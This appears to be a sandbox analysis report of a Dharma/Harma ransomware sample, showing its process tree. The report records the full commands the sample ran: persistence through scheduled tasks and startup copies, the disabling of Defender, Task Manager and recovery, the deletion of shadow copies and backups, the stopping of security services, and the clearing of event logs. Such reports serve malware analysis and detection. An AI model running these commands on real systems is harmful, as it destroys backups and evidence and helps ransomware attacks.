PID 4720 wrote to memory of 4716	4720	cmd.exe	112
PID 2068 wrote to memory of 3568	2068	30e1234ef3e570667526fdb006832b12.exe	135
PID 2068 wrote to memory of 3568	2068	30e1234ef3e570667526fdb006832b12.exe	135
PID 2068 wrote to memory of 3568	2068	30e1234ef3e570667526fdb006832b12.exe	135
PID 3568 wrote to memory of 548	3568	cmd.exe	113
PID 3568 wrote to memory of 548	3568	cmd.exe	113
PID 3568 wrote to memory of 548	3568	cmd.exe	113
PID 2068 wrote to memory of 4104	2068	30e1234ef3e570667526fdb006832b12.exe	134
PID 2068 wrote to memory of 4104	2068	30e1234ef3e570667526fdb006832b12.exe	134
PID 2068 wrote to memory of 4104	2068	30e1234ef3e570667526fdb006832b12.exe	134
PID 3568 wrote to memory of 3028	3568	cmd.exe	115

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1956	attrib.exe
3592	attrib.exe
3244	attrib.exe
4432	attrib.exe
3184	attrib.exe

C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe
"C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3352
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:3296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
  2⤵
  - Drops startup file
  PID:4548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
  2⤵
  PID:740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:4268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    PID:4716
  - - C:\Windows\SysWOW64\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:1596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
  2⤵
  PID:3364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
  2⤵
  PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
  2⤵
  PID:1156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
  2⤵
  PID:2720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:924
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:4060
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:4928
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:3220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:2828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
  2⤵
  PID:2840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:4104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt" && exit
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt"
    3⤵
    PID:5072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
  2⤵
  PID:4992
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
    3⤵
    PID:4440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
  2⤵
  PID:4088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
  2⤵
  PID:1252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
  2⤵
  PID:4192
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c bcdedit /set {default} recoveryenabled no
    3⤵
    PID:2840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
  2⤵
  PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c wbadmin delete catalog -quiet/
    3⤵
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop avpsus /y
  2⤵
  PID:2796
- - C:\Windows\SysWOW64\net.exe
    net stop avpsus /y
    3⤵
    PID:396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:1860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
  2⤵
  PID:2628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
  2⤵
  PID:3356
- - C:\Windows\SysWOW64\net.exe
    net stop BMR Boot Service /y
    3⤵
    PID:4516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop mfewc /y
  2⤵
  PID:1704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
  2⤵
  PID:4128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:5104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
  2⤵
  PID:2556
- - C:\Windows\SysWOW64\sc.exe
    sc config SstpSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
  2⤵
  PID:5004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
  2⤵
  PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:1444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win d:*.dsk
  2⤵
  PID:3924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s HRMPUB
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s HRMPUB
    3⤵
    - Views/modifies file attributes
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del %0
  2⤵
  PID:1604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:4628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:4500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:4428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:4916
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:4080
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:3108
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
    3⤵
    PID:792
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:4064
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:924
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4892
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"
    3⤵
    PID:400
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:716
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:768
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
    3⤵
    - Clears Windows event logs
    PID:1112
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
    3⤵
    PID:3440
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
      4⤵
      Creates scheduled task(s)
      PID:4220
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:4472
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:512
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:3120
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:1824
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
    3⤵
    - Clears Windows event logs
    PID:3904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
    3⤵
    - Clears Windows event logs
    PID:4052
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
    3⤵
    PID:372
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:212
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
    3⤵
    - Clears Windows event logs
    PID:4396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4600
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
    3⤵
    PID:404
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3640
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Privacy-Auditing/Operational"
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
    3⤵
    PID:712
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\wevtutil.exe
